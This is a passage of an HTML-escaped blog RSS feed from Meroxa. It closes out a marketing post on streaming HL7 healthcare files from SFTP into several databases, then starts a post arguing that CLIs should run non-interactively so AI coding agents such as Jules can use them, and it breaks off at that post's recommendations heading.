    style=&quot;padding-bottom: 101%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAUCAYAAACNiR0NAAAACXBIWXMAAAsTAAALEwEAmpwYAAACA0lEQVR42uWUS2/TQBSF7fqROE6C4zS2kzhJk9iOxy9cHJqiQEQ3bPg77NgjFYQEZcXPQuKxAMGGNX/hcGcSUCsWFW0XSCw+zWhkn7lz7pmR9uoubhLpnxRUdlxLUDE8gVxzIGk9gaz3rijIhdQu/WyjZY/hDmZwBlNY+5O/F+RVcaHqaINqdYKIFaiqQyyXFeIkv0TQ6F9AEaMH1RzAn2awvRDjGcPRakUcI4i4IHkg+CXye+79gUzr9bYP49ZY+MXZqzvQTNqk4Ym5pNNuWmO7oBouas2BEJR1+tCaQbUCgWLN0XAYTDeBYvqQFFugm300yceWPUKtNYDkT0LELEFWlGBpjnkYo93xYfZzsGfvkL/4hPT0A7LnH5Gfvkd+9h29R08QzmIcRBXGU4a8yJBmKaYBgzSaBGBJgvx2ifLwDoJwAavrw5pUyF9+xvLNN5SvvqI6I15/QfH2B5zHTxGHDEGywnxRYLN5gPX9NcKYPKy3hlTqUJSuEdwjkS/yp9YJoNkRdIKPppei1c+gNPmRO+LI3KJ2d3vkensISeLBJOQdYr5rkKzZF1FJoEGNoQJkHmZ1n5roikI4yqU3hSo9D6+cd1sTscnR7UfwRhEWMUNEeH549WDfPX6IcrnBQZCSh2vy8J4I+bWvnkG+ucO5oNkZ39DjoG/h2ZX+jwf2vOBPopnqbmqJCwgAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Meroxa HL7 Pipeline&quot;
        title=&quot;&quot;
        src=&quot;/static/cd188879b80803483f9d53d444a6fa35/5a190/mermaid-diagram-2025-06-04-095001.png&quot;
        srcset=&quot;/static/cd188879b80803483f9d53d444a6fa35/772e8/mermaid-diagram-2025-06-04-095001.png 200w,
/static/cd188879b80803483f9d53d444a6fa35/e17e5/mermaid-diagram-2025-06-04-095001.png 400w,
/static/cd188879b80803483f9d53d444a6fa35/5a190/mermaid-diagram-2025-06-04-095001.png 800w,
/static/cd188879b80803483f9d53d444a6fa35/c1b63/mermaid-diagram-2025-06-04-095001.png 1200w,
/static/cd188879b80803483f9d53d444a6fa35/29007/mermaid-diagram-2025-06-04-095001.png 1600w,
/static/cd188879b80803483f9d53d444a6fa35/a5c81/mermaid-diagram-2025-06-04-095001.png 2333w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;Meroxa SFTP to HL7 Demo Video&lt;/h2&gt;
&lt;iframe width=&quot;560&quot; height=&quot;315&quot; src=&quot;https://www.youtube.com/embed/uRJ67FkdjrU?si=Ybh5i8udHY7paAPp&quot; title=&quot;YouTube video player&quot; frameborder=&quot;0&quot; allow=&quot;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share&quot; referrerpolicy=&quot;strict-origin-when-cross-origin&quot; allowfullscreen&gt;&lt;/iframe&gt;
&lt;p&gt;&lt;a href=&quot;https://www.youtube.com/watch?app=desktop&amp;#x26;v=uRJ67FkdjrU&quot;&gt;https://www.youtube.com/watch?app=desktop&amp;#x26;v=uRJ67FkdjrU&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;1. Setting Up the Data Flow&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;In this example, we&apos;re building a pipeline that:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Monitors an SFTP server for incoming HL7 files&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Processes and converts the data to FHIR format when needed&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Simultaneously delivers the data to multiple destinations:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;PostgreSQL database&lt;/li&gt;
&lt;li&gt;Oracle database&lt;/li&gt;
&lt;li&gt;Databricks&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong&gt;2. Creating the Pipeline&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Using Conduit&apos;s platform, we:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Create a new application&lt;/li&gt;
&lt;li&gt;Configure an SFTP source connector with proper credentials&lt;/li&gt;
&lt;li&gt;Add three destinations: PostgreSQL, Oracle, and Databricks&lt;/li&gt;
&lt;li&gt;Attach our custom HL7 processor to handle format conversion&lt;/li&gt;
&lt;li&gt;Add additional processors as needed for specific destination requirements&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;&lt;strong&gt;3. Results: From Days to Seconds&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;With this pipeline deployed, what previously took up to 5 business days now happens in seconds:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Patient records are detected immediately when uploaded to the SFTP server&lt;/li&gt;
&lt;li&gt;Data is automatically transformed and delivered to all three destinations simultaneously&lt;/li&gt;
&lt;li&gt;Our test patient record &quot;Tremaine Stanton&quot; appears in all systems in real-time&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h2&gt;🧠 What Teams Are Building with Meroxa&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Real-Time ADT Notifications&lt;/strong&gt; → routed instantly to care teams&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Live Lab Result Streaming&lt;/strong&gt; → to EHRs, public dashboards, or AI alerts&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Prior Auth Automation&lt;/strong&gt; → kick off workflows the moment orders hit&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Predictive Readmission Alerts&lt;/strong&gt; → powered by real-time FHIR streams&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Multi-Destination Sync&lt;/strong&gt; → from legacy EHRs to modern warehouses&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;It’s not just faster. It’s smarter, more scalable, and easier to maintain.&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;📈 The Impact&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Faster care decisions&lt;/strong&gt; → no waiting on faxes or manual exports&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Lower operational cost&lt;/strong&gt; → eliminate duplicate tests and data errors&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Better compliance&lt;/strong&gt; → every message traceable, every pipeline secure&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Future-proof infrastructure&lt;/strong&gt; → bridge legacy HL7 to FHIR and AI, today&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h2&gt;🚀 Ready to Modernize Healthcare Data?&lt;/h2&gt;
&lt;p&gt;Meroxa helps healthcare teams unify fragmented data, power intelligent workflows, and move at the speed of care.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;You don’t have to choose between legacy systems and modern AI.&lt;/p&gt;
&lt;p&gt;With Meroxa, you get both—live and secure.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;👉 &lt;strong&gt;&lt;a href=&quot;https://meroxa.com/contact&quot;&gt;Schedule a demo&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;👉 &lt;strong&gt;&lt;a href=&quot;https://github.com/conduitio-labs/conduit-processor-hl7&quot;&gt;Explore HL7/FHIR pipelines on GitHub&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[AI Coding Agents Are Here and Your CLI Is Not Ready]]></title><description><![CDATA[After having worked on three CLIs (Heroku’s, Meroxa’s and Conduit’s) and advised on some others, I can confidently say this: if your CLI cannot fully operate without human intervention, you are screwed.]]></description><link>https://meroxa.com/blog/ai-coding-agents-are-here-and-your-cli-is-not-ready</link><guid isPermaLink="false">https://meroxa.com/blog/ai-coding-agents-are-here-and-your-cli-is-not-ready</guid><dc:creator><![CDATA[Raúl Barroso]]></dc:creator><pubDate>Mon, 02 Jun 2025 12:12:00 GMT</pubDate><content:encoded>&lt;p&gt;After having worked on three CLIs (&lt;a href=&quot;https://devcenter.heroku.com/articles/heroku-cli&quot;&gt;Heroku’s&lt;/a&gt;, &lt;a href=&quot;https://meroxa.com/blog/how-we-built-our-meroxa-cli/&quot;&gt;Meroxa’s&lt;/a&gt; and &lt;a href=&quot;https://github.com/ConduitIO/conduit/discussions/1642&quot;&gt;Conduit’s&lt;/a&gt;) and advised on some others, I can confidently say this: if your CLI cannot fully operate without human intervention, you are screwed.&lt;/p&gt;
&lt;p&gt;One of the main things people often tend to forget when it comes to building a CLI that is called out in the &lt;a href=&quot;https://clig.dev/&quot;&gt;CLI developer guidelines&lt;/a&gt; is &lt;a href=&quot;https://clig.dev/#interactivity&quot;&gt;Interactivity&lt;/a&gt;. After all, many product-oriented minds want to have a similar experience in the terminal as they would on a web interface. We want to feel that we are still the drivers of machines with a specific set of options while getting things done in a fun way. Isn&apos;t that something we all want?&lt;/p&gt;
&lt;p&gt;It is time to change the terminal mindset, and approach your CLI product differently. Not only does it need to be functional for scripting purposes; it’s possible that it won&apos;t even be a human invoking your commands at all.&lt;/p&gt;
&lt;h2&gt;Enter example A. Trying out Jules with SvelteKit.&lt;/h2&gt;
&lt;p&gt;Following a recent announcement of an ex-colleague at Heroku, I wanted to give &lt;a href=&quot;https://jules.google/&quot;&gt;Jules&lt;/a&gt; a try. If you haven’t heard about it, it’s a coding agent recently announced at the latest Google I/O.&lt;/p&gt;
&lt;p&gt;You connect it to GitHub, you set up a prompt, and Jules does the job for you. That’s the basic idea. The demos I have watched so far focused on iterating over existing running projects, so I wanted to try something from scratch instead. I went ahead, and after connecting Jules solely to a &lt;a href=&quot;https://github.com/raulb/chato&quot;&gt;GitHub repository&lt;/a&gt; I created for this purpose, I gave it this prompt:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Hey Jules, I&apos;d like to build a web application that lets me create an event and find the best time to meet for my friends and I. Something like a Doodle. The event will have a dedicated link that I could use to share with my friends so they can submit their preferences and tell me what&apos;s the right day to meet based on the number of people who can make it. The coding languages I like are Javascript (Typescript), Ruby and Go. My preferred language for this one is Typescript actually. The web app should be mobile friendly since friends will likely use that device. Some frameworks i&apos;m familiar with is Svelte / React. Maybe use Svelte and for styling things like TailwindCSS. I haven&apos;t written a single like of code for this application yet, though I&apos;m fairly familiar with all this. I only want to see how you work on these type of requests. Could you help me with this?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;The tasks that I got back were:&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;Initialize project:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Set up a new Svelte project with Typescript
support.&lt;/li&gt;
&lt;li&gt;Integrate TailwindCSS for styling.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Core Data Structures:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Define Typescript interfaces for Event
(name, description, unique link/ID) and
Availability (participant name, selected
time slots).&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Basic Routing:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Set up basic routing for:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Home page (to create new events).&lt;/li&gt;
&lt;li&gt;Event page (to view an event and submit
availability - using a unique event ID in the
URL).&lt;/li&gt;
&lt;li&gt;Results page (to view the best times for an
event - also using the event ID).&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;I approved the plan. It sounded reasonable enough to start with. All good so far, right? Well, the issue I shockingly ran into after a few minutes is that Jules couldn’t successfully figure out a nice way to do the first step in one go.&lt;/p&gt;
&lt;h3&gt;Here are only some of the things it tried&lt;/h3&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/19aa3c99d57e67a88d5ebae45b33dc41/73dae/cleanshot-2025-05-28-at-5%E2%80%AF.00.23-2x.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 55.00000000000001%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAABH0lEQVR42qWR6Y6DMAyEw5WScJZyhEKhtPv+rzhru7RSb2n3xyeDwZPxRJ0OC5bphJnq6fiDIz0v8xmHYZLePC3UW6Q/9CO6xsG1/RPcn8YjVF01SNOUyJBludQkSRGGIXzfhx8EQsDV86CUesJb+9uyIsFdizAIsdEbaK0RRVqGXw2+4yZYVBeH1iaCMRaJTcUhE8dG4MMMVf7OB34U7LsRvRsxUGZcr0ImtrRyID9fkQiIL4IDnBvQUbBN6yjH4uaEhTW5uzi1kuvXlV27R123aOmWeF1jEnKZISXyvBDHdo3hXbZ3gnzdGQ2yMyaKIkFHG3H3asWPgttyJy88GDxk9ohSr/E8fxUkrSIv7075C0+XwlmVxfZfsMbejfgFYW3x1vC5PMkAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;CleanShot 2025-05-28 at 5 .00.23@2x.png&quot;
        title=&quot;&quot;
        src=&quot;/static/19aa3c99d57e67a88d5ebae45b33dc41/5a190/cleanshot-2025-05-28-at-5%E2%80%AF.00.23-2x.png&quot;
        srcset=&quot;/static/19aa3c99d57e67a88d5ebae45b33dc41/772e8/cleanshot-2025-05-28-at-5%E2%80%AF.00.23-2x.png 200w,
/static/19aa3c99d57e67a88d5ebae45b33dc41/e17e5/cleanshot-2025-05-28-at-5%E2%80%AF.00.23-2x.png 400w,
/static/19aa3c99d57e67a88d5ebae45b33dc41/5a190/cleanshot-2025-05-28-at-5%E2%80%AF.00.23-2x.png 800w,
/static/19aa3c99d57e67a88d5ebae45b33dc41/c1b63/cleanshot-2025-05-28-at-5%E2%80%AF.00.23-2x.png 1200w,
/static/19aa3c99d57e67a88d5ebae45b33dc41/29007/cleanshot-2025-05-28-at-5%E2%80%AF.00.23-2x.png 1600w,
/static/19aa3c99d57e67a88d5ebae45b33dc41/73dae/cleanshot-2025-05-28-at-5%E2%80%AF.00.23-2x.png 2122w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/177fa41a67307fd1b81454f107195b3f/2dc7d/cleanshot-2025-05-28-at-5%E2%80%AF.01.00-2x.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 64.99999999999999%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAAsTAAALEwEAmpwYAAABn0lEQVR42p1T2XKDMAzEJCEEGx9gDOQgmf7/P6paYTft9Kl92DGS7fWuJKr79qTH/UX360av7YO2x4vW+UpxTJSmhbHS/A3pF5acX4Sjcs6T0T31xpLtHXkXSHNsOG6aM6m6JqVqqusdqqw5dzgceD1QVVXkbKAqxpnGcRIyrU0m68laR+dzS12nhfxy6eQbuba9SKw7I2KQP51OIqoKfpAEJC/LjYYhChDjoRBGGkKk4/HIKhQrK6gzlCiFQiF01svhdX3Qk2t45fV22yilRero3SDKoQornPTZTccoSlEeIRyHiUCa0iqAvcjKxF77tmz5jJDxNwAyAyDmfNM0si+WEcSYaObu6twg2EbDPO/DOvbwIPIoA/KA4ybCCR7eFYZJ7EzTLDZN7jA2YQWvQx2s43KB5HsvzQNxy83am8IHd5uJTL4M6eg0yFEOEGCcgh+/FCLf53piH6OzE/ImFNp8AEpwWV7mb5REwOdgHaXBt9iGUib5QYgASsqclRH4CxSPE1ZpimYSSeb5+ivZDvWew4lrV367sv4HuIuf4RPjnillSx4eegAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;CleanShot 2025-05-28 at 5 .01.00@2x.png&quot;
        title=&quot;&quot;
        src=&quot;/static/177fa41a67307fd1b81454f107195b3f/5a190/cleanshot-2025-05-28-at-5%E2%80%AF.01.00-2x.png&quot;
        srcset=&quot;/static/177fa41a67307fd1b81454f107195b3f/772e8/cleanshot-2025-05-28-at-5%E2%80%AF.01.00-2x.png 200w,
/static/177fa41a67307fd1b81454f107195b3f/e17e5/cleanshot-2025-05-28-at-5%E2%80%AF.01.00-2x.png 400w,
/static/177fa41a67307fd1b81454f107195b3f/5a190/cleanshot-2025-05-28-at-5%E2%80%AF.01.00-2x.png 800w,
/static/177fa41a67307fd1b81454f107195b3f/c1b63/cleanshot-2025-05-28-at-5%E2%80%AF.01.00-2x.png 1200w,
/static/177fa41a67307fd1b81454f107195b3f/29007/cleanshot-2025-05-28-at-5%E2%80%AF.01.00-2x.png 1600w,
/static/177fa41a67307fd1b81454f107195b3f/2dc7d/cleanshot-2025-05-28-at-5%E2%80%AF.01.00-2x.png 1760w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/acf7f5d4f22fc25eedca8bbed7f18ba4/2d912/cleanshot-2025-05-28-at-5%E2%80%AF.01.29-2x.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 77.5%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAQCAYAAAAWGF8bAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB0UlEQVR42pWU6ZaiMBCFI4gsKvsW9oDa8/4vWFO3aGx7prWPP75TgSSXWlFmvNJivrjMtxVzo74dSVctNXV3t68ww0JqmVaR6/wh3JY/92fsTcNMZlzk8NBOD4w0duYbl+lGquUvtw17UDdiOz7Y6O5OXTWCrltKk5yytKA8K4U4SikKEyEMY+qagVTGG1XZyIGyqHmtqSo01SwQRwlhH6RpTkFwJN8LxB6PJ7Isi5RStNvtxJZ5TcpxDuT7AXmev16QtScWBx/BpZ/ZBCtSNXsHtFjNlqnWd/eEoyCfRWmB7le2588zM4oydRONg6Ghn8hMnPxxponpu/HrHTMDc5G8FuwJ0vMvY29IIdTzOZQQT6ez5AZIyNZDyNbKryFvQuE5EiHkEbzO2TNBLgouolqbtW2brS3rrYpvCSIfGfcX+izntet6UnFfqh68L9hyM2rdiSDEkYL93nkj3P8EexZbBUtumSROuYkLiripY14nSSZrgAgingj07lNBHEziTEbHtvfiHS44zmrdgyt2e4/8vvQQHkiVWTBNV2G00eZhFMWSUwgeWNx1Xf6w9bxtKm7IjOc05zAxHfgKNjDT354x3zLnNf8kMpnzR5AK/O7+AgFAdeN+Nnr8AAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;CleanShot 2025-05-28 at 5 .01.29@2x.png&quot;
        title=&quot;&quot;
        src=&quot;/static/acf7f5d4f22fc25eedca8bbed7f18ba4/5a190/cleanshot-2025-05-28-at-5%E2%80%AF.01.29-2x.png&quot;
        srcset=&quot;/static/acf7f5d4f22fc25eedca8bbed7f18ba4/772e8/cleanshot-2025-05-28-at-5%E2%80%AF.01.29-2x.png 200w,
/static/acf7f5d4f22fc25eedca8bbed7f18ba4/e17e5/cleanshot-2025-05-28-at-5%E2%80%AF.01.29-2x.png 400w,
/static/acf7f5d4f22fc25eedca8bbed7f18ba4/5a190/cleanshot-2025-05-28-at-5%E2%80%AF.01.29-2x.png 800w,
/static/acf7f5d4f22fc25eedca8bbed7f18ba4/c1b63/cleanshot-2025-05-28-at-5%E2%80%AF.01.29-2x.png 1200w,
/static/acf7f5d4f22fc25eedca8bbed7f18ba4/29007/cleanshot-2025-05-28-at-5%E2%80%AF.01.29-2x.png 1600w,
/static/acf7f5d4f22fc25eedca8bbed7f18ba4/2d912/cleanshot-2025-05-28-at-5%E2%80%AF.01.29-2x.png 1772w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/309b7bd2712c970f9713240e1577c5e4/61016/cleanshot-2025-05-28-at-5%E2%80%AF.02.00-2x.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 106%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAVCAYAAABG1c6oAAAACXBIWXMAAAsTAAALEwEAmpwYAAACrklEQVR42o2U15biQAxEjQHb4BxxAEyc2f//Qa2ubDNhw5mHOp3VpepqObdhlMvpKqfhLLfLQ8Yz/VH7d7mONxl1DdC/nG/Sd0epikbq8vCB6iCN4jxcxCmLSvb7UBFJ4O8kSVKJokSiMJZYWxBFsYS6Hsfpx5yuh2H06m82WynzUpymbu2GLM2lqhrbsAv2Bvqe58tqtXrBdV3D57nVyhXHcaTI5oBnTXPoRzlqqgT2fN8OseknIOiXgARqmk7aQy9FUUuRV5JqYFLngiTJLK08KyRTBMHu3wHRMNfcadEELTjgK0vfpw1kt9vbmPnvEiwyWEAl4nArDDhES9AFPAYsgyCwQ+v1xvBdjoVhDsOhO6kVTmqFWvr2KDbWFhzRtT9Ldxika4d57SQHlYn0PiNPCznquvMc7/K4vpkHn/d3uV+f1n97/JLH7c3maBkDvEhgvPodt/EhDqLHcWLp4jNEX9pArbPdbmd41qKxu15PcCeste9o2ryD01StPQp6IXqgWmJizM4DYPb9LrQ15nydQ28waRzbPBfxHg75M5Hnhb0S7JKZYaqssQ8wFj/xISkzaFV0DN7qA/T9Sce91Cp+pmLDmHS9mR1SeJ73kmGykjsFrMrG2PCagwpblrV0WgCwi/3VWV/YF6oRe5FoYQ+hfDa7pVzqxkDNC7NBg5IyB/jXy+G6Ppi12FMqAUgwn9sltWVCwPmn1PYbOMT344uZ2FQT1dYqzMwy+aSpVZ14AmMksIDQ5DCBeZzQylI8l7TQDnDBFDidgvK3448SBl4/BW1gaDcvWmk6HCStaVxZiSM1gM4QgExqGpb2HWeGpTEyD85/9r+lyln9YZeXbSiwpLRUGIAVGG82G+vzE35aD/OlHtrzW60rbRJkWW42IfV9GH6pQn8D/mybTn4DNd/lUgJP9ygAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;CleanShot 2025-05-28 at 5 .02.00@2x.png&quot;
        title=&quot;&quot;
        src=&quot;/static/309b7bd2712c970f9713240e1577c5e4/5a190/cleanshot-2025-05-28-at-5%E2%80%AF.02.00-2x.png&quot;
        srcset=&quot;/static/309b7bd2712c970f9713240e1577c5e4/772e8/cleanshot-2025-05-28-at-5%E2%80%AF.02.00-2x.png 200w,
/static/309b7bd2712c970f9713240e1577c5e4/e17e5/cleanshot-2025-05-28-at-5%E2%80%AF.02.00-2x.png 400w,
/static/309b7bd2712c970f9713240e1577c5e4/5a190/cleanshot-2025-05-28-at-5%E2%80%AF.02.00-2x.png 800w,
/static/309b7bd2712c970f9713240e1577c5e4/c1b63/cleanshot-2025-05-28-at-5%E2%80%AF.02.00-2x.png 1200w,
/static/309b7bd2712c970f9713240e1577c5e4/29007/cleanshot-2025-05-28-at-5%E2%80%AF.02.00-2x.png 1600w,
/static/309b7bd2712c970f9713240e1577c5e4/61016/cleanshot-2025-05-28-at-5%E2%80%AF.02.00-2x.png 1770w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;In the end, this message told me it couldn’t initialize the project the way I wanted:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/8f59b5aaa8988ac9b61c912a1ea4d0e5/e92cd/cleanshot-2025-05-28-at-5%E2%80%AF.03.10-2x.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 15.5%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAZUlEQVR42o3OORKAIBQDUC6DyA4fUNzuf6yIzGgrxSvSJGFB78ixgnxCCqWLjlrOSI2ZLWauICf9SwkDpoWHkwElbljpQE0nFtp7zmEF2QLJ9TD2rKvJ9JKarw+5BbYNORWH3r1uRLNbPk2s15sAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;CleanShot 2025-05-28 at 5 .03.10@2x.png&quot;
        title=&quot;&quot;
        src=&quot;/static/8f59b5aaa8988ac9b61c912a1ea4d0e5/5a190/cleanshot-2025-05-28-at-5%E2%80%AF.03.10-2x.png&quot;
        srcset=&quot;/static/8f59b5aaa8988ac9b61c912a1ea4d0e5/772e8/cleanshot-2025-05-28-at-5%E2%80%AF.03.10-2x.png 200w,
/static/8f59b5aaa8988ac9b61c912a1ea4d0e5/e17e5/cleanshot-2025-05-28-at-5%E2%80%AF.03.10-2x.png 400w,
/static/8f59b5aaa8988ac9b61c912a1ea4d0e5/5a190/cleanshot-2025-05-28-at-5%E2%80%AF.03.10-2x.png 800w,
/static/8f59b5aaa8988ac9b61c912a1ea4d0e5/c1b63/cleanshot-2025-05-28-at-5%E2%80%AF.03.10-2x.png 1200w,
/static/8f59b5aaa8988ac9b61c912a1ea4d0e5/29007/cleanshot-2025-05-28-at-5%E2%80%AF.03.10-2x.png 1600w,
/static/8f59b5aaa8988ac9b61c912a1ea4d0e5/e92cd/cleanshot-2025-05-28-at-5%E2%80%AF.03.10-2x.png 1778w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Whether this is a flaw in Jules or Svelte itself, I’ll leave it up to the reader, but something I can already say is that Svelte (&lt;strong&gt;replace this with the product you’re developing&lt;/strong&gt;) could have made it easier for the AI coding agent to resolve.&lt;/p&gt;
&lt;h3&gt;Make your CLI AI agent ready&lt;/h3&gt;
